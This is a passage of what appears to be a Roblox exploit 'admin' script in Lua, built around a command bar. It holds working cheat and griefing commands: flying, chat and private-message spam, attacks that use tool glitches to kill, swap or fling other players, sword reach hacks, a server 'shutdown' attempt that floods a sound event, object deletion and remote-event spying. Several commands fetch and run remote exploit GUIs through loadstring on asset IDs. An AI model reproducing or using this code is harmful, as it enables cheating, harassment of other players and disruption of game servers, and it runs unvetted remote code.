  2622.             BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  2623.             else
  2624.             BV.velocity = Vector3.new(0, 0.1, 0)
  2625.             end
  2626.             BG.cframe = workspace.CurrentCamera.CoordinateFrame
  2627.                     until not flying
  2628.                     CONTROL = {F = 0, B = 0, L = 0, R = 0}
  2629.                     lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  2630.                     SPEED = 0
  2631.                     BG:destroy()
  2632.                     BV:destroy()
  2633.                     lplayer.Character.Humanoid.PlatformStand = false
  2634.                 end)
  2635.             end
  2636.         Mouse.KeyDown:connect(function(KEY)
  2637.             if KEY:lower() == 'w' then
  2638.                 CONTROL.F = speedfly
  2639.             elseif KEY:lower() == 's' then
  2640.                 CONTROL.B = -speedfly
  2641.             elseif KEY:lower() == 'a' then
  2642.                 CONTROL.L = -speedfly
  2643.             elseif KEY:lower() == 'd' then
  2644.                 CONTROL.R = speedfly
  2645.             end
  2646.         end)
  2647.         Mouse.KeyUp:connect(function(KEY)
  2648.             if KEY:lower() == 'w' then
  2649.                 CONTROL.F = 0
  2650.             elseif KEY:lower() == 's' then
  2651.                 CONTROL.B = 0
  2652.             elseif KEY:lower() == 'a' then
  2653.                 CONTROL.L = 0
  2654.             elseif KEY:lower() == 'd' then
  2655.                 CONTROL.R = 0
  2656.             end
  2657.         end)
  2658.         fly()
  2659.         end
  2660.         if string.sub(CMDBAR.Text, 1, 5) == ("unfly") then
  2661.             flying = false
  2662.             lplayer.Character.Humanoid.PlatformStand = false
  2663.         end
  2664.         if string.sub(CMDBAR.Text, 1, 5) == ("chat ") then
  2665.             game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer((string.sub(CMDBAR.Text, 6)), "All")
  2666.         end
  2667.         if string.sub(CMDBAR.Text, 1, 5) == ("spam ") then
  2668.             spamtext = (string.sub(CMDBAR.Text, 6))
  2669.             spamming = true
  2670.         end
  2671.         if string.sub(CMDBAR.Text, 1, 6) == ("unspam") then
  2672.             spamming = false
  2673.         end
  2674.         if string.sub(CMDBAR.Text, 1, 9) == ("spamwait ") then
  2675.             spamdelay = (string.sub(CMDBAR.Text, 10))
  2676.         end
  2677.         if string.sub(CMDBAR.Text, 1, 7) == ("pmspam ") then
  2678.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  2679.                 pmspammed = v.Name
  2680.                 spammingpm = true
  2681.             end
  2682.         end
  2683.         if string.sub(CMDBAR.Text, 1, 8) == ("unpmspam") then
  2684.             spammingpm = false
  2685.         end
  2686.         if string.sub(CMDBAR.Text, 1, 8) == ("cfreeze ") then
  2687.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 9))) do
  2688.                 v.Character["Left Leg"].Anchored = true
  2689.                 v.Character["Left Arm"].Anchored = true
  2690.                 v.Character["Right Leg"].Anchored = true
  2691.                 v.Character["Right Arm"].Anchored = true
  2692.                 v.Character.Torso.Anchored = true
  2693.                 v.Character.Head.Anchored = true
  2694.             end
  2695.         end
  2696.         if string.sub(CMDBAR.Text, 1, 10) == ("uncfreeze ") then
  2697.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 11))) do
  2698.                 v.Character["Left Leg"].Anchored = false
  2699.                 v.Character["Left Arm"].Anchored = false
  2700.                 v.Character["Right Leg"].Anchored = false
  2701.                 v.Character["Right Arm"].Anchored = false
  2702.                 v.Character.Torso.Anchored = false
  2703.                 v.Character.Head.Anchored = false
  2704.             end
  2705.         end
  2706.         if string.sub(CMDBAR.Text, 1, 8) == ("unlockws") then
  2707.             local a = game:GetService("Workspace"):getChildren()
  2708.             for i = 1, #a do
  2709.                 if a[i].className == "Part" then
  2710.                     a[i].Locked = false
  2711.                 elseif a[i].className == "Model" then
  2712.                     local r = a[i]:getChildren()
  2713.                     for i = 1, #r do
  2714.                         if r[i].className == "Part" then
  2715.                         r[i].Locked = false
  2716.                         end
  2717.                     end
  2718.                 end
  2719.             end
  2720.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2721.             Title = "Success!";
  2722.             Text = "Workspace unlocked. Use ;lockws to lock.";
  2723.             })
  2724.         end
  2725.         if string.sub(CMDBAR.Text, 1, 6) == ("lockws") then
  2726.             local a = game:GetService("Workspace"):getChildren()
  2727.             for i = 1, #a do
  2728.                 if a[i].className == "Part" then
  2729.                     a[i].Locked = true
  2730.                 elseif a[i].className == "Model" then
  2731.                     local r = a[i]:getChildren()
  2732.                     for i = 1, #r do
  2733.                         if r[i].className == "Part" then
  2734.                         r[i].Locked = true
  2735.                         end
  2736.                     end
  2737.                 end
  2738.             end
  2739.         end
  2740.         if string.sub(CMDBAR.Text, 1, 6) == ("btools") then
  2741.             local Clone_T = Instance.new("HopperBin",lplayer.Backpack)
  2742.             Clone_T.BinType = "Clone"
  2743.             local Destruct = Instance.new("HopperBin",lplayer.Backpack)
  2744.             Destruct.BinType = "Hammer"
  2745.             local Hold_T = Instance.new("HopperBin",lplayer.Backpack)
  2746.             Hold_T.BinType = "Grab"
  2747.         end
  2748.         if string.sub(CMDBAR.Text, 1, 6) == ("pstand") then
  2749.             lplayer.Character.Humanoid.PlatformStand = true
  2750.         end
  2751.         if string.sub(CMDBAR.Text, 1, 8) == ("unpstand") then
  2752.             lplayer.Character.Humanoid.PlatformStand = false
  2753.         end
  2754.         if string.sub(CMDBAR.Text, 1, 9) == ("blockhead") then
  2755.             lplayer.Character.Head.Mesh:Destroy()
  2756.         end
  2757.         if string.sub(CMDBAR.Text, 1, 3) == ("sit") then
  2758.             lplayer.Character.Humanoid.Sit = true
  2759.         end
  2760.         if string.sub(CMDBAR.Text, 1, 9) == ("bringobj ") then
  2761.             local function bringobjw()
  2762.             for i,obj in ipairs(game:GetService("Workspace"):GetDescendants()) do
  2763.             if obj.Name == (string.sub(CMDBAR.Text, 10)) then
  2764.             obj.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  2765.             obj.CanCollide = false
  2766.             obj.Transparency = 0.7
  2767.             wait()
  2768.             obj.CFrame = lplayer.Character["Left Leg"].CFrame
  2769.             wait()
  2770.             obj.CFrame = lplayer.Character["Right Leg"].CFrame
  2771.             wait()
  2772.             obj.CFrame = lplayer.Character["Head"].CFrame
  2773.             end
  2774.             end
  2775.             end
  2776.             while wait() do
  2777.                 bringobjw()
  2778.             end
  2779.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2780.             Title = "BringObj";
  2781.             Text = "BringObj enabled.";
  2782.             })
  2783.         end
  2784.         if string.sub(CMDBAR.Text, 1, 6) == ("wsvis ") then
  2785.             vis = (string.sub(CMDBAR.Text, 7))
  2786.             local a = game:GetService("Workspace"):GetDescendants()
  2787.             for i = 1, #a do
  2788.                 if a[i].className == "Part" then
  2789.                     a[i].Transparency = vis
  2790.                 elseif a[i].className == "Model" then
  2791.                     local r = a[i]:getChildren()
  2792.                     for i = 1, #r do
  2793.                         if r[i].className == "Part" then
  2794.                         r[i].Transparency = vis
  2795.                         end
  2796.                     end
  2797.                 end
  2798.             end
  2799.         end
  2800.         if string.sub(CMDBAR.Text, 1, 10) == ("hypertotal") then
  2801.             loadstring(game:GetObjects("rbxassetid://1255063809")[1].Source)()
  2802.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2803.             Title = "Success!";
  2804.             Text = "HyperTotal GUI Loaded!";
  2805.             })
  2806.         end
  2807.         if string.sub(CMDBAR.Text, 1, 4) == ("cmds") then
  2808.             CMDSFRAME.Visible = true
  2809.         end
  2810.         if string.sub(CMDBAR.Text, 1, 9) == ("rmeshhats") then
  2811.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2812.                 if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  2813.                     v.Handle.Mesh:Destroy()
  2814.                 end
  2815.             end
  2816.         end
  2817.         if string.sub(CMDBAR.Text, 1, 9) == ("blockhats") then
  2818.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2819.                 if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  2820.                     v.Handle.Mesh:Destroy()
  2821.                 end
  2822.             end
  2823.         end
  2824.         if string.sub(CMDBAR.Text, 1, 9) == ("rmeshtool") then
  2825.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2826.                 if (v:IsA("Tool")) then
  2827.                     v.Handle.Mesh:Destroy()
  2828.                 end
  2829.             end
  2830.         end
  2831.         if string.sub(CMDBAR.Text, 1, 9) == ("blocktool") then
  2832.             for i,v in pairs(lplayer.Character:GetChildren()) do
  2833.                 if (v:IsA("Tool")) then
  2834.                     v.Handle.Mesh:Destroy()
  2835.                 end
  2836.             end
  2837.         end
  2838.         if string.sub(CMDBAR.Text, 1, 7) == ("spinner") then
  2839.             local p = Instance.new("RocketPropulsion")
  2840.             p.Parent = lplayer.Character.HumanoidRootPart
  2841.             p.Name = "Spinner"
  2842.             p.Target = lplayer.Character["Left Arm"]
  2843.             p:Fire()
  2844.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2845.             Title = "Spinner enabled";
  2846.             Text = "Type ;nospinner to disable.";
  2847.             })
  2848.         end
  2849.         if string.sub(CMDBAR.Text, 1, 9) == ("nospinner") then
  2850.             lplayer.Character.HumanoidRootPart.Spinner:Destroy()
  2851.         end
  2852.         if string.sub(CMDBAR.Text, 1, 6) == ("reachd") then
  2853.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  2854.                 if v:isA("Tool") then
  2855.                     local a = Instance.new("SelectionBox",v.Handle)
  2856.                     a.Adornee = v.Handle
  2857.                     v.Handle.Size = Vector3.new(0.5,0.5,60)
  2858.                     v.GripPos = Vector3.new(0,0,0)
  2859.                     lplayer.Character.Humanoid:UnequipTools()
  2860.                 end
  2861.             end
  2862.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2863.             Title = "Reach applied!";
  2864.             Text = "Applied to equipped sword. Use ;noreach to disable.";
  2865.             })
  2866.         end
  2867.         if string.sub(CMDBAR.Text, 1, 6) == ("reach ") then
  2868.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  2869.                 if v:isA("Tool") then
  2870.                     local a = Instance.new("SelectionBox",v.Handle)
  2871.                     a.Name = "Reach"
  2872.                     a.Adornee = v.Handle
  2873.                     v.Handle.Size = Vector3.new(0.5,0.5,(string.sub(CMDBAR.Text, 7)))
  2874.                     v.GripPos = Vector3.new(0,0,0)
  2875.                     lplayer.Character.Humanoid:UnequipTools()
  2876.                 end
  2877.             end
  2878.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2879.             Title = "Reach applied!";
  2880.             Text = "Applied to equipped sword. Use ;noreach to disable.";
  2881.             })
  2882.         end
  2883.         if string.sub(CMDBAR.Text, 1, 7) == ("noreach") then
  2884.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Character:GetChildren())do
  2885.                 if v:isA("Tool") then
  2886.                     v.Handle.Reach:Destroy()
  2887.                 end
  2888.             end
  2889.             game:GetService("StarterGui"):SetCore("SendNotification", {
  2890.             Title = "Reach removed!";
  2891.             Text = "Removed reach from equipped sword.";
  2892.             })
  2893.         end
  2894.         if string.sub(CMDBAR.Text, 1, 6) == ("rkill ") then
  2895.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7)))do
  2896.                 lplayer.Character.Humanoid.Name = 1
  2897.                 local l = lplayer.Character["1"]:Clone()
  2898.                 l.Parent = lplayer.Character
  2899.                 l.Name = "Humanoid"
  2900.                 wait(0.1)
  2901.                 lplayer.Character["1"]:Destroy()
  2902.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2903.                 lplayer.Character.Animate.Disabled = true
  2904.                 wait(0.1)
  2905.                 lplayer.Character.Animate.Disabled = false
  2906.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2907.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2908.                 lplayer.Character.Humanoid:EquipTool(v)
  2909.                 end
  2910.                 wait(0.1)
  2911.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2912.                 wait(0.2)
  2913.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2914.                 wait(0.5)
  2915.                 lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,10,-100000))
  2916.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2917.                 Title = "Tools needed!";
  2918.                 Text = "You need a tool in your backpack for this command!";
  2919.                 })
  2920.             end
  2921.         end
  2922.         if string.sub(CMDBAR.Text, 1, 6) == ("tp me ") then
  2923.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 7))) do
  2924.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2925.             end
  2926.         end
  2927.         if string.sub(CMDBAR.Text, 1, 7) == ("cbring ") then
  2928.             if (string.sub(CMDBAR.Text, 8)) == "all" or (string.sub(CMDBAR.Text, 8)) == "All" or (string.sub(CMDBAR.Text, 8)) == "ALL" then
  2929.                 cbringall = true
  2930.             else
  2931.                 for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  2932.                     brplr = v.Name
  2933.                 end
  2934.             end
  2935.             cbring = true
  2936.         end
  2937.         if string.sub(CMDBAR.Text, 1, 8) == ("uncbring") then
  2938.             cbring = false
  2939.             cbringall = false
  2940.         end
  2941.         if string.sub(CMDBAR.Text, 1, 5) == ("swap ") then
  2942.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  2943.                 local NOWPLR = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2944.                 local NOW = lplayer.Character.HumanoidRootPart.CFrame
  2945.                 lplayer.Character.Humanoid.Name = 1
  2946.                 local l = lplayer.Character["1"]:Clone()
  2947.                 l.Parent = lplayer.Character
  2948.                 l.Name = "Humanoid"
  2949.                 wait(0.1)
  2950.                 lplayer.Character["1"]:Destroy()
  2951.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2952.                 lplayer.Character.Animate.Disabled = true
  2953.                 wait(0.1)
  2954.                 lplayer.Character.Animate.Disabled = false
  2955.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2956.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2957.                 lplayer.Character.Humanoid:EquipTool(v)
  2958.                 end
  2959.                 local function tp(player,player2)
  2960.                 local char1,char2=player.Character,player2.Character
  2961.                 if char1 and char2 then
  2962.                 char1:MoveTo(char2.Head.Position)
  2963.                 end
  2964.                 end
  2965.                 wait(0.1)
  2966.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2967.                 wait(0.2)
  2968.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  2969.                 wait(0.5)
  2970.                 lplayer.Character.HumanoidRootPart.CFrame = NOW
  2971.                 wait(0.6)
  2972.                 tp(lplayer, game:GetService("Players")[v.Name])
  2973.                 wait(0.4)
  2974.                 lplayer.Character.HumanoidRootPart.CFrame = NOWPLR
  2975.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  2976.                 Title = "Tools needed!";
  2977.                 Text = "You need a tool in your backpack for this command!";
  2978.                 })
  2979.             end
  2980.         end
  2981.         if string.sub(CMDBAR.Text, 1, 7) == ("glitch ") then
  2982.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 8))) do
  2983.                 lplayer.Character.Humanoid.Name = 1
  2984.                 local l = lplayer.Character["1"]:Clone()
  2985.                 l.Parent = lplayer.Character
  2986.                 l.Name = "Humanoid"
  2987.                 wait(0.1)
  2988.                 lplayer.Character["1"]:Destroy()
  2989.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  2990.                 lplayer.Character.Animate.Disabled = true
  2991.                 wait(0.1)
  2992.                 lplayer.Character.Animate.Disabled = false
  2993.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  2994.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  2995.                 lplayer.Character.Humanoid:EquipTool(v)
  2996.                 end
  2997.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  2998.                 wait(0.3)
  2999.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  3000.                 wait(0.4)
  3001.                 b = Instance.new("BodyForce")
  3002.                 b.Parent = lplayer.Character.HumanoidRootPart
  3003.                 b.Name = "Glitch"
  3004.                 b.Force = Vector3.new(100000000,5000,0)
  3005.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  3006.                 Title = "Tools needed!";
  3007.                 Text = "You need a tool in your backpack for this command!";
  3008.                 })
  3009.             end
  3010.         end
  3011.         if string.sub(CMDBAR.Text, 1, 8) == ("unglitch") then
  3012.             lplayer.Character.HumanoidRootPart.Glitch:Destroy()
  3013.             lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(10000,0,10000)
  3014.             b = Instance.new("BodyForce")
  3015.             b.Parent = lplayer.Character.HumanoidRootPart
  3016.             b.Name = "unGlitch"
  3017.             b.Force = Vector3.new(0,-5000000,0)
  3018.             wait(2)
  3019.             lplayer.Character.HumanoidRootPart.unGlitch:Destroy()
  3020.         end
  3021.         if string.sub(CMDBAR.Text, 1, 8) == ("grespawn") then
  3022.             lplayer.Character.Humanoid.Health = 0
  3023.             wait(1)
  3024.             lplayer.Character.Head.CFrame = CFrame.new(1000000,0,1000000)
  3025.             lplayer.Character.Torso.CFrame = CFrame.new(1000000,0,1000000)
  3026.         end
  3027.         if string.sub(CMDBAR.Text, 1, 8) == ("explorer") then
  3028.             loadstring(game:GetObjects("rbxassetid://492005721")[1].Source)()
  3029.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3030.             Title = "Success!";
  3031.             Text = "DEX Explorer has loaded.";
  3032.             })
  3033.         end
  3034.         if string.sub(CMDBAR.Text, 1, 5) == ("anim ") then
  3035.             local Anim = Instance.new("Animation")
  3036.             Anim.AnimationId = "rbxassetid://"..(string.sub(CMDBAR.Text, 6))
  3037.             local track = lplayer.Character.Humanoid:LoadAnimation(Anim)
  3038.             track:Play(.1, 1, 1)
  3039.         end
  3040.         if string.sub(CMDBAR.Text, 1, 7) == ("animgui") then
  3041.             loadstring(game:GetObjects("rbxassetid://1202558084")[1].Source)()
  3042.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3043.             Title = "Success!";
  3044.             Text = "Energize Animations GUI has loaded.";
  3045.             })
  3046.         end
  3047.         if string.sub(CMDBAR.Text, 1, 7) == ("savepos") then
  3048.             saved = lplayer.Character.HumanoidRootPart.CFrame
  3049.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3050.             Title = "Position Saved";
  3051.             Text = "Use ;loadpos to return to saved position.";
  3052.             })
  3053.         end
  3054.         if string.sub(CMDBAR.Text, 1, 7) == ("loadpos") then
  3055.             lplayer.Character.HumanoidRootPart.CFrame = saved
  3056.         end
  3057.         if string.sub(CMDBAR.Text, 1, 5) == ("bang ") then
  3058.             for i,v in pairs(GetPlayer(string.sub(CMDBAR.Text, 6))) do
  3059.                 local Anim2 = Instance.new("Animation")
  3060.                 Anim2.AnimationId = "rbxassetid://148840371"
  3061.                 local track2 = lplayer.Character.Humanoid:LoadAnimation(Anim2)
  3062.                 track2:Play(.1, 1, 1)
  3063.                 bplrr = v.Name
  3064.                 banpl = true
  3065.             end
  3066.         end
  3067.         if string.sub(CMDBAR.Text, 1, 6) == ("unbang") then
  3068.             banpl = false
  3069.         end
  3070.         if string.sub(CMDBAR.Text, 1, 9) == ("bringmod ") then
  3071.             local function bringmodw()
  3072.             for i,obj in ipairs(game:GetService("Workspace"):GetDescendants()) do
  3073.             if obj.Name == (string.sub(CMDBAR.Text, 10)) then
  3074.             for i,ch in pairs(obj:GetDescendants()) do
  3075.             if (ch:IsA("BasePart")) then
  3076.             ch.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  3077.             ch.CanCollide = false
  3078.             ch.Transparency = 0.7
  3079.             wait()
  3080.             ch.CFrame = lplayer.Character["Left Leg"].CFrame
  3081.             wait()
  3082.             ch.CFrame = lplayer.Character["Right Leg"].CFrame
  3083.             wait()
  3084.             ch.CFrame = lplayer.Character["Head"].CFrame
  3085.             end
  3086.             end
  3087.             end
  3088.             end
  3089.             end
  3090.             while wait() do
  3091.                 bringmodw()
  3092.             end
  3093.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3094.             Title = "BringMod";
  3095.             Text = "BringMod enabled.";
  3096.             })
  3097.         end
  3098.         if string.sub(CMDBAR.Text, 1, 7) == ("respawn") then
  3099.             local mod = Instance.new('Model', workspace) mod.Name = 're '..lplayer.Name
  3100.             local hum = Instance.new('Humanoid', mod)
  3101.             local ins = Instance.new('Part', mod) ins.Name = 'Torso' ins.CanCollide = false ins.Transparency = 1
  3102.             lplayer.Character = mod
  3103.         end
  3104.         if string.sub(CMDBAR.Text, 1, 8) == ("shutdown") then
  3105.             game:GetService'RunService'.Stepped:Connect(function()
  3106.             pcall(function()
  3107.                 for i,v in pairs(game:GetService'Players':GetPlayers()) do
  3108.                     if v.Character ~= nil and v.Character:FindFirstChild'Head' then
  3109.                         for _,x in pairs(v.Character.Head:GetChildren()) do
  3110.                             if x:IsA'Sound' then x.Playing = true x.CharacterSoundEvent:FireServer(true, true) end
  3111.                         end
  3112.                     end
  3113.                 end
  3114.             end)
  3115.             end)
  3116.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3117.             Title = "Attempting Shutdown";
  3118.             Text = "Shutdown Attempt has begun.";
  3119.             })
  3120.         end
  3121.         if string.sub(CMDBAR.Text, 1, 7) == ("delobj ") then
  3122.             objtodel = (string.sub(CMDBAR.Text, 8))
  3123.             for i,v in pairs(game:GetService("Workspace"):GetDescendants()) do
  3124.                 if v.Name == objtodel then
  3125.                     v:Destroy()
  3126.                 end
  3127.             end
  3128.         end
  3129.         if string.sub(CMDBAR.Text, 1, 7) == ("getplrs") then
  3130.             for i,v in pairs(game:GetService("Players"):GetPlayers())do
  3131.                 print(v)
  3132.             end
  3133.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3134.             Title = "Printed";
  3135.             Text = "Players have been printed to console. (F9)";
  3136.             })
  3137.         end
  3138.         if string.sub(CMDBAR.Text, 1, 8) == ("deldecal") then
  3139.             for i,v in pairs(game:GetService("Workspace"):GetDescendants())do
  3140.                 if (v:IsA("Decal")) then
  3141.                     v:Destroy()
  3142.                 end
  3143.             end
  3144.         end
  3145.         if string.sub(CMDBAR.Text, 1, 10) == ("opfinality") then
  3146.             loadstring(game:GetObjects("rbxassetid://1294358929")[1].Source)()
  3147.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3148.             Title = "Success!";
  3149.             Text = "OpFinality GUI has loaded.";
  3150.             })
  3151.         end
  3152.         if string.sub(CMDBAR.Text, 1, 7) == ("remotes") then
  3153.             remotes = true
  3154.             added = true
  3155.             game.DescendantAdded:connect(function(rmt)
  3156.             if added == true then
  3157.             if remotes == true then
  3158.             if rmt:IsA("RemoteEvent") then
  3159.             print("A RemoteEvent was added!")
  3160.             print(" game." .. rmt:GetFullName() .. " | RemoteEvent")
  3161.             print(" game." .. rmt:GetFullName() .. " | RemoteEvent", 247, 0, 0, true)
  3162.             end end end
  3163.             end)
  3164.             game.DescendantAdded:connect(function(rmtfnctn)
  3165.             if added == true then
  3166.             if remotes == true then
  3167.             if rmtfnctn:IsA("RemoteFunction") then
  3168.             warn("A RemoteFunction was added!")
  3169.             warn(" game." .. rmtfnctn:GetFullName() .. " | RemoteFunction")
  3170.             print(" game." .. rmtfnctn:GetFullName() .. " | RemoteFunction", 5, 102, 198, true)
  3171.             end end end
  3172.             end)
  3173.            
  3174.             game.DescendantAdded:connect(function(bndfnctn)
  3175.             if added == true then
  3176.             if binds == true then
  3177.             if bndfnctn:IsA("BindableFunction") then
  3178.             print("A BindableFunction was added!")
  3179.             print(" game." .. bndfnctn:GetFullName() .. " | BindableFunction")
  3180.             print(" game." .. bndfnctn:GetFullName() .. " | BindableFunction", 239, 247, 4, true)
  3181.             end end end
  3182.             end)
  3183.            
  3184.             game.DescendantAdded:connect(function(bnd)
  3185.             if added == true then
  3186.             if binds == true then
  3187.             if bnd:IsA("BindableEvent") then
  3188.             warn("A BindableEvent was added!")
  3189.             warn(" game." .. bnd:GetFullName() .. " | BindableEvent")
  3190.             print(" game." .. bnd:GetFullName() .. " | BindableEvent", 13, 193, 22, true)
  3191.             end end end
  3192.             end)
  3193.            
  3194.            
  3195.             if binds == true then
  3196.             for i,v in pairs(game:GetDescendants()) do
  3197.             if v:IsA("BindableFunction") then
  3198.             print(" game." .. v:GetFullName() .. " | BindableFunction")
  3199.             print(" game." .. v:GetFullName() .. " | BindableFunction", 239, 247, 4, true)
  3200.             end end
  3201.             for i,v in pairs(game:GetDescendants()) do
  3202.             if v:IsA("BindableEvent") then
  3203.             warn(" game." .. v:GetFullName() .. " | BindableEvent")
  3204.             print(" game." .. v:GetFullName() .. " | BindableEvent", 13, 193, 22, true)
  3205.             end end
  3206.             else
  3207.             print("Off")
  3208.             end
  3209.             if remotes == true then
  3210.             for i,v in pairs(game:GetDescendants()) do
  3211.             if v:IsA("RemoteFunction") then
  3212.             warn(" game." .. v:GetFullName() .. " | RemoteFunction")
  3213.             print(" game." .. v:GetFullName() .. " | RemoteFunction", 5, 102, 198, true)
  3214.             end end
  3215.             wait()
  3216.             for i,v in pairs(game:GetDescendants()) do
  3217.             if v:IsA("RemoteEvent") then
  3218.             print(" game." .. v:GetFullName() .. " | RemoteEvent")
  3219.             print(" game." .. v:GetFullName() .. " | RemoteEvent", 247, 0, 0, true)
  3220.             end end
  3221.             else
  3222.             print("Off")
  3223.             end
  3224.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3225.             Title = "Printing Remotes";
  3226.             Text = "Type ;noremotes to disable.";
  3227.             })
  3228.         end
  3229.         if string.sub(CMDBAR.Text, 1, 9) == ("noremotes") then
  3230.             remotes = false
  3231.             added = false
  3232.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3233.             Title = "Printing Remotes Disabled";
  3234.             Text = "Type ;remotes to enable.";
  3235.             })
  3236.         end
  3237.         if string.sub(CMDBAR.Text, 1, 9) == ("tpdefault") then
  3238.             spin = false
  3239.             followed = false
  3240.             traill = false
  3241.             noclip = false
  3242.             annoying = false
  3243.             hwalk = false
  3244.             cbringing = false
  3245.         end
  3246.         if string.sub(CMDBAR.Text, 1, 7) == ("stopsit") then
  3247.             stopsitting = true
  3248.         end
  3249.         if string.sub(CMDBAR.Text, 1, 5) == ("gosit") then
  3250.             stopsitting = false
  3251.         end
  3252.         if string.sub(CMDBAR.Text, 1, 7) == ("version") then
  3253.             print(adminversion)
  3254.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3255.             Title = "Version";
  3256.             Text = adminversion;
  3257.             })
  3258.         end
  3259.         if string.sub(CMDBAR.Text, 1, 7) == ("clicktp") then
  3260.             clickgoto = true
  3261.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3262.             Title = "Click TP";
  3263.             Text = "Press E to teleport to mouse position";
  3264.             })
  3265.         end
  3266.         if string.sub(CMDBAR.Text, 1, 9) == ("noclicktp") then
  3267.             clickgoto = false
  3268.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3269.             Title = "Click TP";
  3270.             Text = "Click TP has been disabled.";
  3271.             })
  3272.         end
  3273.         if string.sub(CMDBAR.Text, 1, 7) == ("toolson") then
  3274.             gettingtools = true
  3275.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3276.             Title = "Tools Enabled";
  3277.             Text = "Automatically colleting tools dropped.";
  3278.             })
  3279.         end
  3280.         if string.sub(CMDBAR.Text, 1, 8) == ("toolsoff") then
  3281.             gettingtools = false
  3282.             game:GetService("StarterGui"):SetCore("SendNotification", {
  3283.             Title = "Tools Disabled";
  3284.             Text = "Click TP has been disabled.";
  3285.             })
  3286.         end
  3287.         if string.sub(CMDBAR.Text, 1, 9) == ("delcmdbar") then
  3288.             ScreenGui:Destroy()
  3289.         end
  3290.         if string.sub(CMDBAR.Text, 1, 5) == ("reset") then
  3291.             lplayer.Character.Head:Destroy()
  3292.         end
  3293.         if string.sub(CMDBAR.Text, 1, 6) == ("state ") then
  3294.             statechosen = string.sub(CMDBAR.Text, 7)
  3295.             changingstate = true
  3296.         end
  3297.         if string.sub(CMDBAR.Text, 1, 8) == ("gravity ") then
  3298.             game:GetService("Workspace").Gravity = string.sub(CMDBAR.Text, 9)
  3299.         end
  3300.         if string.sub(CMDBAR.Text, 1, 9) == ("looprhats") then
  3301.         removingmeshhats = true
  3302.         end
  3303.         if string.sub(CMDBAR.Text, 1, 11) == ("unlooprhats") then
  3304.             removingmeshhats = false
  3305.         end
  3306.         if string.sub(CMDBAR.Text, 1, 9) == ("looprtool") then
  3307.             removingmeshtool = true
  3308.         end
  3309.         if string.sub(CMDBAR.Text, 1, 11) == ("unlooprtool") then
  3310.             removingmeshtool = false
  3311.         end
  3312.         if string.sub(CMDBAR.Text, 1, 9) == ("givetool ") then
  3313.             for i,v in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  3314.                 if v:IsA("Tool") then
